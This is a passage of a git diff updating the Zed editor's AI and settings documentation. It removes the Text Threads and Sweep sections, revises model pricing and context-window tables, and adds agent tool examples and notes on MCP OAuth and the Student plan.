-When you sign in by clicking the Copilot icon in the status bar, you will be redirected to your configured enterprise URL to complete authentication. +Once set, Zed routes Copilot requests through your enterprise endpoint. +When you sign in by clicking the Copilot icon in the status bar, you are redirected to your configured enterprise URL to complete authentication. All other Copilot features and usage remain the same. Copilot can provide multiple completion alternatives, and these can be navigated with the following actions: @@ -338,33 +242,11 @@ Copilot can provide multiple completion alternatives, and these can be navigated - {#action editor::NextEditPrediction} ({#kb editor::NextEditPrediction}): To cycle to the next edit prediction - {#action editor::PreviousEditPrediction} ({#kb editor::PreviousEditPrediction}): To cycle to the previous edit prediction -### Sweep {#sweep} - -To use [Sweep](https://sweep.dev/) as your provider: - -1. Open the Settings Editor (`Cmd+,` on macOS, `Ctrl+,` on Linux/Windows) -2. Search for "Edit Predictions" and click **Configure Providers** -3. Find the Sweep section and enter your API key from the - [Sweep dashboard](https://app.sweep.dev/) - -Alternatively, click the edit prediction icon in the status bar and select -**Configure Providers** from the menu. - -After adding your API key, Sweep will appear in the provider dropdown in the status bar menu, where you can select it. You can also set it directly in your settings file: - -```json [settings] -{ - "edit_predictions": { - "provider": "sweep" - } -} -``` - ### Mercury Coder {#mercury-coder} To use [Mercury Coder](https://www.inceptionlabs.ai/) by Inception Labs as your provider: -1. Open the Settings Editor (`Cmd+,` on macOS, `Ctrl+,` on Linux/Windows) +1. Open the Settings Editor ({#kb zed::OpenSettings}) 2. Search for "Edit Predictions" and click **Configure Providers** 3. 
Find the Mercury section and enter your API key from the [Inception Labs dashboard](https://platform.inceptionlabs.ai/dashboard/api-keys) @@ -406,8 +288,6 @@ After adding your API key, Codestral will appear in the provider dropdown in the ### Self-Hosted OpenAI-compatible servers -> **Preview:** This feature is available in Zed Preview. It will be included in the next Stable release. - You can use any self-hosted server that implements the OpenAI completion API format. This works with vLLM, llama.cpp server, LocalAI, and other compatible servers. #### Configuration diff --git a/docs/src/ai/external-agents.md b/docs/src/ai/external-agents.md index 7a76e795f127651201a6483986ebbc917088bf96..dc3b246f34f28a7a0560992e64b1918f2fe69a9e 100644 --- a/docs/src/ai/external-agents.md +++ b/docs/src/ai/external-agents.md @@ -9,6 +9,8 @@ Zed supports many external agents, including CLI-based ones, through the [Agent Zed supports [Gemini CLI](https://github.com/google-gemini/gemini-cli) (the reference ACP implementation), [Claude Agent](https://platform.claude.com/docs/en/agent-sdk/overview), [Codex](https://developers.openai.com/codex), [GitHub Copilot](https://github.com/github/copilot-language-server-release), and [additional agents](#add-more-agents) you can configure. +For Zed's built-in agent and the full list of tools it can use natively, see [Agent Tools](./tools.md). + > Note that Zed's interaction with external agents is strictly UI-based; the billing, legal, and terms arrangement is directly between you and the agent provider. > Zed does not charge for use of external agents, and our [zero-data retention agreements/privacy guarantees](./ai-improvement.md) are **_only_** applicable for Zed's hosted models. 
diff --git a/docs/src/ai/inline-assistant.md b/docs/src/ai/inline-assistant.md index f1391f8d58dc8746bceece6bcfa3ce091ea4785f..f560451dbbbac11b34910f9512c7fc7a0ad54853 100644 --- a/docs/src/ai/inline-assistant.md +++ b/docs/src/ai/inline-assistant.md @@ -7,7 +7,7 @@ description: Transform code inline with AI in Zed. Send selections to any LLM fo ## Usage Overview -Use {#kb assistant::InlineAssist} to open the Inline Assistant in editors, text threads, the rules library, channel notes, and the terminal panel. +Use {#kb assistant::InlineAssist} to open the Inline Assistant in editors, the rules library, channel notes, and the terminal panel. The Inline Assistant sends your current selection (or line) to a language model and replaces it with the response. diff --git a/docs/src/ai/llm-providers.md b/docs/src/ai/llm-providers.md index 3a32bd96e73d9df427897798681f203c4ceb2273..7c34d13e9616bbcf9482f6f8a79699ad7e2f96ff 100644 --- a/docs/src/ai/llm-providers.md +++ b/docs/src/ai/llm-providers.md @@ -5,7 +5,7 @@ description: Bring your own API keys to Zed. Set up Anthropic, OpenAI, Google AI # LLM Providers -To use AI in Zed, you need to have at least one large language model provider set up. Once configured, providers are available in the [Agent Panel](./agent-panel.md), [Inline Assistant](./inline-assistant.md), and [Text Threads](./text-threads.md). +To use AI in Zed, you need to have at least one large language model provider set up. Once configured, providers are available in the [Agent Panel](./agent-panel.md) and [Inline Assistant](./inline-assistant.md). You can do that by either subscribing to [one of Zed's plans](./plans-and-usage.md), or by using API keys you already have for the supported providers. For general AI setup, see [Configuration](./configuration.md). 
@@ -88,7 +88,7 @@ With that done, choose one of the three authentication methods: While it's possible to configure through the Agent Panel settings UI by entering your AWS access key and secret directly, we recommend using named profiles instead for better security practices. To do this: -1. Create an IAM User that you can assume in the [IAM Console](https://us-east-1.console.aws.amazon.com/iam/home?region=us-east-1#/users). +1. Create an IAM User in the [IAM Console](https://us-east-1.console.aws.amazon.com/iam/home?region=us-east-1#/users). 2. Create security credentials for that User, save them and keep them secure. 3. Open the Agent Configuration with (`agent: open settings`) and go to the Amazon Bedrock section 4. Copy the credentials from Step 2 into the respective **Access Key ID**, **Secret Access Key**, and **Region** fields. @@ -152,8 +152,6 @@ For the most up-to-date supported regions and models, refer to the [Supported Mo #### Extended Context Window {#bedrock-extended-context} -> **Preview:** This feature is available in Zed Preview. It will be included in the next Stable release. - Anthropic models on Bedrock support a 1M token extended context window through the `anthropic_beta` API parameter. To enable this feature, set `"allow_extended_context": true` in your Bedrock configuration: ```json [settings] @@ -173,8 +171,6 @@ Zed enables extended context for supported models (Claude Sonnet 4.5 and Claude #### Image Support {#bedrock-image-support} -> **Preview:** This feature is available in Zed Preview. It will be included in the next Stable release. - Bedrock models that support vision (Claude 3 and later, Amazon Nova Pro and Lite, Meta Llama 3.2 Vision models, Mistral Pixtral) can receive images in conversations and tool results. ### Anthropic {#anthropic} @@ -630,8 +626,6 @@ The OpenRouter API key will be saved in your keychain. Zed will also use the `OPENROUTER_API_KEY` environment variable if it's defined. 
-> **Changed in Preview (v0.225).** See [release notes](/releases#0.225). - When using OpenRouter as your assistant provider, you must explicitly select a model in your settings. OpenRouter no longer provides a default model selection. Configure your preferred OpenRouter model in `settings.json`: diff --git a/docs/src/ai/mcp.md b/docs/src/ai/mcp.md index 08608a9871b7f826c4789bf2213cd7fdd6d624bb..cba02eab4da9c66ed360e0599bc52862c242c180 100644 --- a/docs/src/ai/mcp.md +++ b/docs/src/ai/mcp.md @@ -56,6 +56,9 @@ You can connect them by adding their commands directly to your settings file ([h "remote-mcp-server": { "url": "custom", "headers": { "Authorization": "Bearer " } + }, + "remote-mcp-server-with-oauth": { + "url": "https://mcp.example.com/mcp" } } } @@ -64,6 +67,8 @@ You can connect them by adding their commands directly to your settings file ([h Alternatively, you can also add a custom server by accessing the Agent Panel's Settings view (also accessible via the `agent: open settings` action). From there, you can add it through the modal that appears when you click the "Add Custom Server" button. +> Note: When a remote MCP server has no configured `"Authorization"` header, Zed will prompt you to authenticate yourself against the MCP server using the standard MCP OAuth flow. 
+ ## Using MCP Servers ### Configuration Check diff --git a/docs/src/ai/models.md b/docs/src/ai/models.md index a86b873ef8aff112ceddbe7da000e4350023ec42..ebd35041f7456fec314886d3b554730e1de83d7f 100644 --- a/docs/src/ai/models.md +++ b/docs/src/ai/models.md @@ -43,10 +43,6 @@ Zed's plans offer hosted versions of major LLMs with higher rate limits than dir | | OpenAI | Cached Input | $0.005 | $0.0055 | | Gemini 3.1 Pro | Google | Input | $2.00 | $2.20 | | | Google | Output | $12.00 | $13.20 | -| Gemini 3.1 Pro | Google | Input | $2.00 | $2.20 | -| | Google | Output | $12.00 | $13.20 | -| Gemini 3 Pro | Google | Input | $2.00 | $2.20 | -| | Google | Output | $12.00 | $13.20 | | Gemini 3 Flash | Google | Input | $0.30 | $0.33 | | | Google | Output | $2.50 | $2.75 | | Grok 4 | X.ai | Input | $3.00 | $3.30 | @@ -70,7 +66,8 @@ As of February 19, 2026, Zed Pro serves newer model versions in place of the ret - Claude Sonnet 4 → Claude Sonnet 4.5 or Claude Sonnet 4.6 - Claude Sonnet 3.7 (retired Feb 19) → Claude Sonnet 4.5 or Claude Sonnet 4.6 - GPT-5.1 and GPT-5 → GPT-5.2 or GPT-5.2 Codex -- Gemini 2.5 Pro → Gemini 3 Pro or Gemini 3.1 Pro +- Gemini 2.5 Pro → Gemini 3.1 Pro +- Gemini 3 Pro → Gemini 3.1 Pro - Gemini 2.5 Flash → Gemini 3 Flash ## Usage {#usage} @@ -86,21 +83,20 @@ A context window is the maximum span of text and code an LLM can consider at onc | Model | Provider | Zed-Hosted Context Window | | ----------------- | --------- | ------------------------- | | Claude Opus 4.5 | Anthropic | 200k | -| Claude Opus 4.6 | Anthropic | 200k | +| Claude Opus 4.6 | Anthropic | 1M | | Claude Sonnet 4.5 | Anthropic | 200k | -| Claude Sonnet 4.6 | Anthropic | 200k | +| Claude Sonnet 4.6 | Anthropic | 1M | | Claude Haiku 4.5 | Anthropic | 200k | | GPT-5.2 | OpenAI | 400k | | GPT-5.2 Codex | OpenAI | 400k | | GPT-5 mini | OpenAI | 400k | | GPT-5 nano | OpenAI | 400k | | Gemini 3.1 Pro | Google | 200k | -| Gemini 3 Pro | Google | 200k | | Gemini 3 Flash | Google | 200k | -> 
Context window limits for hosted Sonnet 4.5/4.6 and Gemini 3.1 Pro/3 Pro/Flash may increase in future releases.
+> Context window limits for hosted Gemini 3.1 Pro and Gemini 3 Flash may increase in future releases.
 
-Each Agent thread and text thread in Zed maintains its own context window.
+Each Agent thread in Zed maintains its own context window.
 The more prompts, attached files, and responses included in a session, the larger the context window grows.
 Start a new thread for each distinct task to keep context focused.
diff --git a/docs/src/ai/overview.md b/docs/src/ai/overview.md
index b05b3ac6a7a3c9ce42e226e75d5e9e28420f8b03..7ea435975ec5ba12f68a7a3ad19007fd65ba65e8 100644
--- a/docs/src/ai/overview.md
+++ b/docs/src/ai/overview.md
@@ -28,11 +28,7 @@ The [Inline Assistant](./inline-assistant.md) works differently: select code or
 
 [Edit Prediction](./edit-prediction.md) provides AI code completions on every keystroke. Each keypress sends a request to the prediction provider, which returns single or multi-line suggestions you accept with `tab`.
 
-The default provider is Zeta, Zed's open-source model trained on open data. You can also use GitHub Copilot, Supermaven, or Codestral.
-
-## Text threads
-
-[Text Threads](./text-threads.md) are conversations with models inside any buffer. They work like a regular editor with your keybindings, multiple cursors, and standard editing features. Content is organized into message blocks with roles (You, Assistant, System).
+The default provider is Zeta, Zed's open-source model trained on open data. You can also use GitHub Copilot or Codestral.
## Getting started diff --git a/docs/src/ai/plans-and-usage.md b/docs/src/ai/plans-and-usage.md index bebc4c4fb30dab6379a645209d21eccda65459d5..bc9e4854475799938dc7383e29edd84bf9493a66 100644 --- a/docs/src/ai/plans-and-usage.md +++ b/docs/src/ai/plans-and-usage.md @@ -7,9 +7,9 @@ description: Understand Zed's AI plans, token-based usage metering, spend limits ## Available Plans {#plans} -For costs and more information on pricing, visit [Zed’s pricing page](https://zed.dev/pricing). +For costs and more information on pricing, visit [Zed's pricing page](https://zed.dev/pricing). -Zed works without AI features or a subscription. No [authentication](../authentication.md) required for the editor itself. +Zed works without AI features or a subscription. No [authentication](../authentication.md) is required for the editor itself. ## Usage {#usage} @@ -17,6 +17,8 @@ Usage of Zed's hosted models is measured on a token basis, converted to dollars Zed Pro comes with $5 of monthly dollar credit. A trial of Zed Pro includes $20 of credit, usable for 14 days. Monthly included credit resets on your monthly billing date. +The [Zed Student plan](https://zed.dev/education) includes $10/month in token credits. The Student plan is available free for one year to verified university students. + To view your current usage, you can visit your account at [dashboard.zed.dev/account](https://dashboard.zed.dev/account). Information from our metering and billing provider, Orb, is embedded on that page. ## Spend Limits {#usage-spend-limits} @@ -25,7 +27,9 @@ At the top of [the Account page](https://dashboard.zed.dev/account), you'll find The default value for all Pro users is $10, for a total monthly spend with Zed of $20 ($10 for your Pro subscription, $10 in incremental token spend). This can be set to $0 to limit your spend with Zed to exactly $10/month. 
If you adjust this limit _higher_ than $10 and consume more than $10 of incremental token spend, you'll be billed via [threshold billing](./billing.md#threshold-billing). -Once the spend limit is hit, we’ll stop any further usage until your token spend limit resets. +Once the spend limit is hit, we'll stop any further usage until your token spend limit resets. + +> **Note:** Spend limits are a Zed Pro feature. Student plan users do not currently have the ability to configure spend limits; usage is capped at the $10/month included credit. ## Business Usage {#business-usage} diff --git a/docs/src/ai/privacy-and-security.md b/docs/src/ai/privacy-and-security.md index 5eac8a43268865920825557aa8f5a20ec9e04839..828953cca74868b097490dfafcb318b8245a2ef8 100644 --- a/docs/src/ai/privacy-and-security.md +++ b/docs/src/ai/privacy-and-security.md @@ -1,21 +1,23 @@ --- title: AI Privacy and Security - Zed -description: Zed's approach to AI privacy: opt-in data sharing by default, zero-data retention with providers, and full open-source transparency. +description: "Zed's approach to AI privacy: opt-in data sharing by default, zero-data retention with providers, and full open-source transparency." --- # Privacy and Security ## Philosophy -Zed aims to collect only the minimum data necessary to serve and improve our product. +Zed collects minimal data necessary to serve and improve our product. Features that could share data, like AI and telemetry, are either opt-in or can be disabled. -Data sharing is opt-in by default. Privacy is not a setting to toggle—it's the baseline. +- **Telemetry**: Zed collects only the data necessary to understand usage and fix issues. Client-side telemetry can be disabled in settings. -As an open-source product, we believe in maximal transparency, and invite you to examine our codebase. If you find issues, we encourage you to share them with us. 
+- **AI**: Data sharing for AI improvement is opt-in, and each share is a one-time action; it does not grant permission for future data collection. You can use Zed's AI features without sharing any data with Zed and without authenticating. -Zed, including AI features, works without sharing data with us and without authentication. +- **Open-Source**: Zed's codebase is public. You can inspect exactly what data is collected and how it's handled. If you find issues, we encourage you to report them. -## Documentation +- **Secure-by-default**: Designing Zed and our Service with "secure-by-default" as an objective is of utmost importance to us. We take your security and ours very seriously and strive to follow industry best-practice in order to uphold that principle. + +## Related Documentation - [Tool Permissions](./tool-permissions.md): Configure granular rules to control which agent actions are auto-approved, blocked, or require confirmation. @@ -23,16 +25,15 @@ Zed, including AI features, works without sharing data with us and without authe - [Telemetry](../telemetry.md): How Zed collects general telemetry data. -- [AI Improvement](./ai-improvement.md): Zed's opt-in-only approach to data collection for AI improvement, whether our Agentic offering or Edit Predictions. +- [Zed AI Features and Privacy](./ai-improvement.md): An overview of Zed's AI features, your data when using AI in Zed, and how to opt-in and help Zed improve these features. - [Accounts](../authentication.md): When and why you'd need to authenticate into Zed, how to do so, and what scope we need from you. -- [Collab](https://zed.dev/faq#data-and-privacy): How Zed's live collaboration works, and how data flows to provide the experience (we don't store your code). +- [Collab](https://zed.dev/faq#data-and-privacy): How Zed's live collaboration works and how data flows. Zed does not store your code. 
## Legal Links -- [Terms of Service](https://zed.dev/terms-of-service) -- [Terms of Use](https://zed.dev/terms) +- [Terms of Service](https://zed.dev/terms) - [Privacy Policy](https://zed.dev/privacy-policy) - [Zed's Contributor License and Feedback Agreement](https://zed.dev/cla) - [Subprocessors](https://zed.dev/subprocessors) diff --git a/docs/src/ai/rules.md b/docs/src/ai/rules.md index 6a23673e824435d129b0230a55f090e8ddd73e0a..1fb47aa562d0b733bb0333e3c571430488c2503c 100644 --- a/docs/src/ai/rules.md +++ b/docs/src/ai/rules.md @@ -74,11 +74,4 @@ The new rules system replaces the Prompt Library except in a few specific cases, ### Slash Commands in Rules Previously, it was possible to use slash commands (now @-mentions) in custom prompts (now rules). -There is currently no support for using @-mentions in rules files, however, slash commands are supported in rules files when used with text threads. -See the documentation for using [slash commands in rules](./text-threads.md#slash-commands-in-rules) for more information. - -### Prompt templates - -Zed maintains backwards compatibility with its original template system, which allows you to customize prompts used throughout the application, including the inline assistant. -While the Rules Library is now the primary way to manage prompts, you can still use these legacy templates to override default prompts. -For more details, see the [Rules Templates](./text-threads.md#rule-templates) section under [Text Threads](./text-threads.md). +There is currently no support for using @-mentions in rules files. diff --git a/docs/src/ai/text-threads.md b/docs/src/ai/text-threads.md index 82ea45510edcd1a74e21477333f6633cd800f217..2315666460fd645f182bd6ff0934c5c1c9f18873 100644 --- a/docs/src/ai/text-threads.md +++ b/docs/src/ai/text-threads.md @@ -1,261 +1,13 @@ --- -title: AI Chat in Your Editor - Zed Text Threads -description: Chat with LLMs directly in your editor with Zed's text threads. 
Full control over context, message roles, and slash commands. +title: Text Threads (Removed) +description: Text threads have been removed from Zed. Use the Agent Panel for all AI conversations. +redirect_to: ./agent-panel.md --- # Text Threads -Text threads in the [Agent Panel](./agent-panel.md) work like a regular editor. -You can use custom keybindings, multiple cursors, and all the standard editing features while chatting. +Text threads have been removed from Zed. -## Text Threads vs. Threads +All AI conversations now happen through the [Agent Panel](./agent-panel.md), which supports agentic workflows including tool calls, file editing, terminal access, and [external agents](./external-agents.md). -Text Threads were Zed's original AI interface. -In May 2025, Zed introduced the current [Agent Panel](./agent-panel.md), designed for agentic workflows. - -The key difference: text threads don't support tool calls and many other more modern agentic features. -They can't autonomously read files, write code, or run commands on your behalf. -Text Threads are for simpler conversational interactions where you send text and receive text responses back. - -Therefore, [MCP servers](./mcp.md) and [external agents](./external-agents.md) are also not available in Text Threads. - -## Usage Overview - -Text threads organize content into message blocks with roles: - -- `You` -- `Assistant` -- `System` - -To begin, type your message in a `You` block. -As you type, the remaining token count for the selected model updates automatically. - -To add context from an editor, highlight text and run `agent: add selection to thread` ({#kb agent::AddSelectionToThread}). -If the selection is code, Zed will wrap it in a fenced code block. - -To submit a message, use {#kb assistant::Assist} (`assistant: assist`). -In text threads, {#kb editor::Newline} inserts a new line instead of submitting, which preserves standard editor behavior. 
- -After you submit a message, the response is streamed below in an `Assistant` message block. -You can cancel the stream at any point with escape, or start a new conversation at any time via cmd-n|ctrl-n. - -Text threads support straightforward conversations, but you can also go back and edit earlier messages—including previous LLM responses—to change direction, refine context, or correct mistakes without starting a new thread or spending tokens on follow-up corrections. -If you want to remove a message block entirely, place your cursor at the beginning of the block and use the `delete` key. - -A typical workflow might involve making edits and adjustments throughout the context to refine your inquiry or provide additional information. -Here's an example: - -1. Write text in a `You` block. -2. Submit the message with {#kb assistant::Assist}. -3. Receive an `Assistant` response that doesn't meet your expectations. -4. Cancel the response with escape. -5. Erase the content of the `Assistant` message block and remove the block entirely. -6. Add additional context to your original message. -7. Submit the message with {#kb assistant::Assist}. - -You can also cycle the role of a message block by clicking on the role, which is useful when you receive a response in an `Assistant` block that you want to edit and send back up as a `You` block. 
- -## Commands Overview {#commands} - -Type `/` at the beginning of a line to see available slash commands: - -- `/default`: Inserts the default rule -- `/diagnostics`: Injects errors reported by the project's language server -- `/fetch`: Fetches the content of a webpage and inserts it -- `/file`: Inserts a single file or a directory of files -- `/now`: Inserts the current date and time -- `/prompt`: Adds a custom-configured prompt to the context ([see Rules Library](./rules.md#rules-library)) -- `/symbols`: Inserts the current tab's active symbols -- `/tab`: Inserts the content of the active tab or all open tabs -- `/terminal`: Inserts a select number of lines of output from the terminal -- `/selection`: Inserts the selected text - -> **Note:** Remember, commands are only evaluated when the text thread is created or when the command is inserted, so a command like `/now` won't continuously update, or `/file` commands won't keep their contents up to date. - -### `/default` - -Read more about `/default` in the [Rules: Editing the Default Rules](./rules.md#default-rules) section. - -Usage: `/default` - -### `/diagnostics` - -Injects errors reported by the project's language server into the context. - -Usage: `/diagnostics [--include-warnings] [path]` - -- `--include-warnings`: Optional flag to include warnings in addition to errors. -- `path`: Optional path to limit diagnostics to a specific file or directory. - -### `/file` - -Inserts the content of a file or directory into the context. Supports glob patterns. - -Usage: `/file ` - -Examples: - -- `/file src/index.js` - Inserts the content of `src/index.js` into the context. -- `/file src/*.js` - Inserts the content of all `.js` files in the `src` directory. -- `/file src` - Inserts the content of all files in the `src` directory. - -### `/now` - -Inserts the current date and time. Useful for informing the model about its knowledge cutoff relative to now. 
- -Usage: `/now` - -### `/prompt` - -Inserts a rule from the Rules Library into the context. Rules can nest other rules. - -Usage: `/prompt ` - -Related: `/default` - -### `/symbols` - -Inserts the active symbols (functions, classes, etc.) from the current tab, providing a structural overview of the file. - -Usage: `/symbols` - -### `/tab` - -Inserts the content of the active tab or all open tabs. - -Usage: `/tab [tab_name|all]` - -- `tab_name`: Optional name of a specific tab to insert. -- `all`: Insert content from all open tabs. - -Examples: - -- `/tab` - Inserts the content of the active tab. -- `/tab "index.js"` - Inserts the content of the tab named "index.js". -- `/tab all` - Inserts the content of all open tabs. - -### `/terminal` - -Inserts recent terminal output (default: 50 lines). - -Usage: `/terminal []` - -- ``: Optional parameter to specify the number of lines to insert (default is 50). - -### `/selection` - -Inserts the currently selected text. Equivalent to `agent: add selection to thread` ({#kb agent::AddSelectionToThread}). - -Usage: `/selection` - -## Commands in the Rules Library {#slash-commands-in-rules} - -[Commands](#commands) can be used in rules, in the Rules Library (previously known as Prompt Library), to insert dynamic content or perform actions. -For example, if you want to create a rule where it is important for the model to know the date, you can use the `/now` command to insert the current date. - -
- -Slash commands in rules **only** work when they are used in text threads. Using them in non-text threads is not supported. - -
- -> **Note:** Slash commands in rules **must** be on their own line. - -See the [list of commands](#commands) above for more information on commands, and what slash commands are available. - -### Example - -```plaintext -You are an expert Rust engineer. The user has asked you to review their project and answer some questions. - -Here is some information about their project: - -/file Cargo.toml -``` - -In the above example, the `/file` command is used to insert the contents of the `Cargo.toml` file (or all `Cargo.toml` files present in the project) into the rule. - -## Nesting Rules - -Similar to adding rules to the default rules, you can nest rules within other rules with the `/prompt` command (only supported in Text Threads currently). - -You might want to nest rules to: - -- Create templates on the fly -- Break collections like docs or references into smaller, mix-and-matchable parts -- Create variants of a similar rule (e.g., `Async Rust - Tokio` vs. `Async Rust - Async-std`) - -### Example - -```plaintext -Title: Zed-Flavored Rust - -## About Zed - -/prompt Zed: Zed (a rule about what Zed is) - -## Rust - Zed Style - -/prompt Rust: Async - Async-std (zed doesn't use tokio) -/prompt Rust: Zed-style Crates (we have some unique conventions) -/prompt Rust - Workspace deps (bias towards reusing deps from the workspace) -``` - -_The text in parentheses above are comments and are not part of the rule._ - -> **Note:** You can technically nest a rule within itself, but we don't recommend doing so. - -By using nested rules, you can create modular and reusable rule components that can be combined in various ways to suit different scenarios. - -> **Note:** When using slash commands to bring in additional context, the injected content can be edited directly inline in the text thread—edits here will not propagate to the saved rules. - -## Extensibility - -Additional slash commands can be provided by extensions. 
- -See [Extension: Slash Commands](../extensions/slash-commands.md) to learn how to create your own. - -## Advanced Concepts - -### Rule Templates {#rule-templates} - -Zed uses rule templates to power internal assistant features, like the terminal assistant, or the content rules used in the inline assistant. - -Zed has the following internal rule templates: - -- `content_prompt.hbs`: Used for generating content in the editor. -- `terminal_assistant_prompt.hbs`: Used for the terminal assistant feature. - -At this point it is unknown if we will expand templates further to be user-creatable. - -### Overriding Templates - -> **Note:** It is not recommended to override templates unless you know what you are doing. Editing templates will break your assistant if done incorrectly. - -Zed allows you to override the default rules used for various assistant features by placing custom Handlebars (.hbs) templates in your `~/.config/zed/prompt_overrides` directory. - -The following templates can be overridden: - -1. [`content_prompt.hbs`](https://github.com/zed-industries/zed/tree/main/assets/prompts/content_prompt.hbs): Used for generating content in the editor. - -2. [`terminal_assistant_prompt.hbs`](https://github.com/zed-industries/zed/tree/main/assets/prompts/terminal_assistant_prompt.hbs): Used for the terminal assistant feature. - -> **Note:** Be sure you want to override these, as you'll miss out on iteration on our built-in features. -> This should be primarily used when developing Zed. - -You can customize these templates to better suit your needs while maintaining the core structure and variables used by Zed. -Zed will automatically reload your prompt overrides when they change on disk. - -Consult Zed's [assets/prompts](https://github.com/zed-industries/zed/tree/main/assets/prompts) directory for current versions you can play with. 
- -### History {#history} - -After you submit your first message in a text thread, a name for your context is generated by the language model, and the context is automatically saved to your file system in - -- `~/.config/zed/conversations` (macOS) -- `~/.local/share/zed/conversations` (Linux) -- `%LocalAppData%\Zed\conversations` (Windows) - -You can access and load previous contexts by clicking on the history button in the top-left corner of the agent panel. - -![Viewing assistant history](https://zed.dev/img/assistant/assistant-history.png) +See the [Agent Panel documentation](./agent-panel.md) to get started. diff --git a/docs/src/ai/tools.md b/docs/src/ai/tools.md index 66f0af571d70fb8db7add2bd89139bf788369de6..bc57f3c378fbc03429fe84993c349b0a5b3ce0d0 100644 --- a/docs/src/ai/tools.md +++ b/docs/src/ai/tools.md @@ -19,10 +19,14 @@ Gets errors and warnings for either a specific file or the entire project, usefu When a path is provided, shows all diagnostics for that specific file. When no path is provided, shows a summary of error and warning counts for all files in the project. +**Example:** After editing `src/parser.rs`, call `diagnostics` with that path to check for type errors immediately. After a larger refactor touching many files, call it without a path to see a project-wide count of errors before deciding what to fix next. + ### `fetch` Fetches a URL and returns the content as Markdown. Useful for providing docs as context. +**Example:** Fetching a library's changelog page to check whether a breaking API change was introduced in a recent version before writing integration code. + ### `find_path` Quickly finds files by matching glob patterns (like "\*_/_.js"), returning matching file paths alphabetically. @@ -31,6 +35,8 @@ Quickly finds files by matching glob patterns (like "\*_/_.js"), returning match Searches file contents across the project using regular expressions, preferred for finding symbols in code without knowing exact file paths. 
+**Example:** To find every call site of a function before renaming it, search for `parse_config\(` — the regex matches the function name followed by an opening parenthesis, filtering out comments or variable names that happen to contain the string. + ### `list_directory` Lists files and directories in a given path, providing an overview of filesystem contents. @@ -55,6 +61,8 @@ Allows the Agent to work through problems, brainstorm ideas, or plan without exe Searches the web for information, providing results with snippets and links from relevant web pages, useful for accessing real-time information. +**Example:** Looking up whether a known bug in a dependency has been patched in a recent release, or finding the current API signature for a third-party library when the local docs are out of date. + ## Edit Tools ### `copy_path` @@ -73,6 +81,8 @@ Deletes a file or directory (including contents recursively) at the specified pa Edits files by replacing specific text with new content. +**Example:** Updating a function signature — the agent identifies the exact lines to replace and provides the updated version, leaving the surrounding code untouched. For widespread renames, it pairs this with `grep` to find every occurrence first. + ### `move_path` Moves or renames a file or directory in the project, performing a rename if only the filename differs. @@ -89,8 +99,12 @@ Saves files that have unsaved changes. Used when files need to be saved before f Executes shell commands and returns the combined output, creating a new shell process for each invocation. +**Example:** After editing a Rust file, run `cargo test --package my_crate 2>&1 | tail -30` to confirm the changes don't break existing tests. Or run `git diff --stat` to review which files have been modified before wrapping up a task. + ## Other Tools -### `subagent` +### `spawn_agent` Spawns a subagent with its own context window to perform a delegated task. 
Useful for running parallel investigations, completing self-contained tasks, or performing research where only the outcome matters. Each subagent has access to the same tools as the parent agent. + +**Example:** While refactoring the authentication module, spawn a subagent to investigate how session tokens are validated elsewhere in the codebase. The parent agent continues its work and reviews the subagent's findings when it completes — keeping both context windows focused on a single task. diff --git a/docs/src/appearance.md b/docs/src/appearance.md index fdf5e239ccf581988e439845d0c2f94e4bb1b95c..1c26d67100379462298c4026dbf578b936b61fb1 100644 --- a/docs/src/appearance.md +++ b/docs/src/appearance.md @@ -15,11 +15,13 @@ Here's how to make Zed feel like home: 1. **Pick a theme**: Press {#kb theme_selector::Toggle} to open the Theme Selector. Arrow through the list to preview themes in real time, and press Enter to apply. -2. **Choose an icon theme**: Run `icon theme selector: toggle` from the command palette to browse icon themes. +2. **Toggle light/dark mode quickly**: Press {#kb theme::ToggleMode}. If you currently use a static `"theme": "..."` value, the first toggle converts it to dynamic mode settings with default themes. -3. **Set your font**: Open the Settings Editor with {#kb zed::OpenSettings} and search for `buffer_font_family`. Set it to your preferred coding font. +3. **Choose an icon theme**: Run `icon theme selector: toggle` from the command palette to browse icon themes. -4. **Adjust font size**: In the same Settings Editor, search for `buffer_font_size` and `ui_font_size` to tweak the editor and interface text sizes. +4. **Set your font**: Open the Settings Editor with {#kb zed::OpenSettings} and search for `buffer_font_family`. Set it to your preferred coding font. + +5. **Adjust font size**: In the same Settings Editor, search for `buffer_font_size` and `ui_font_size` to tweak the editor and interface text sizes. That's it. 
You now have a personalized Zed setup. diff --git a/docs/src/collaboration/overview.md b/docs/src/collaboration/overview.md index 97efdae088d1692ad5840e23c13bc50d4ecb75c7..1022ec683bf5eefab55b9aff939c568098fdda30 100644 --- a/docs/src/collaboration/overview.md +++ b/docs/src/collaboration/overview.md @@ -24,8 +24,6 @@ See the [Data and Privacy FAQs](https://zed.dev/faq#data-and-privacy) for more d ### Selecting Audio Devices -> **Preview:** This feature is available in Zed Preview. It will be included in the next Stable release. - You can select specific input and output audio devices instead of using system defaults. To configure audio devices: 1. Open {#kb zed::OpenSettings} diff --git a/docs/src/completions.md b/docs/src/completions.md index 9962fd5f24c604bb22f73ba5a797de936f9cb0d4..81c2efa3514a4623408b2869325ab0991ce382d6 100644 --- a/docs/src/completions.md +++ b/docs/src/completions.md @@ -8,7 +8,7 @@ description: Zed's code completions from language servers and edit predictions. Zed supports two sources for completions: 1. "Code Completions" provided by Language Servers (LSPs) automatically installed by Zed or via [Zed Language Extensions](languages.md). -2. "Edit Predictions" provided by Zed's own Zeta model or by external providers like [GitHub Copilot](#github-copilot) or [Supermaven](#supermaven). +2. "Edit Predictions" provided by Zed's own Zeta model or by external providers like [GitHub Copilot](#github-copilot). 
## Language Server Code Completions {#code-completions} diff --git a/docs/src/configuring-languages.md b/docs/src/configuring-languages.md index 4e9bbce822f2f0d87ac2a8c9617698acd5983243..46a10e80e3807c1dd57df2184e814b2abe8647d7 100644 --- a/docs/src/configuring-languages.md +++ b/docs/src/configuring-languages.md @@ -122,11 +122,40 @@ You can specify your preference using the `language_servers` setting: In this example: -- `intelephense` is set as the primary language server -- `phpactor` is disabled (note the `!` prefix) -- `...` expands to the rest of the language servers that are registered for PHP +- `intelephense` is set as the primary language server. +- `phpactor` and `phptools` are disabled (note the `!` prefix). +- `"..."` expands to the rest of the language servers registered for PHP that are not already listed. -This configuration allows you to tailor the language server setup to your specific needs, ensuring that you get the most suitable functionality for your development workflow. +The `"..."` entry acts as a wildcard that includes any registered language server you haven't explicitly mentioned. Servers you list by name keep their position, and `"..."` fills in the remaining ones at that point in the list. Servers prefixed with `!` are excluded entirely. This means that if a new language server extension is installed or a new server is registered for a language, `"..."` will automatically include it. If you want full control over which servers are enabled, omit `"..."` — only the servers you list by name will be used. + +#### Examples + +Suppose you're working with 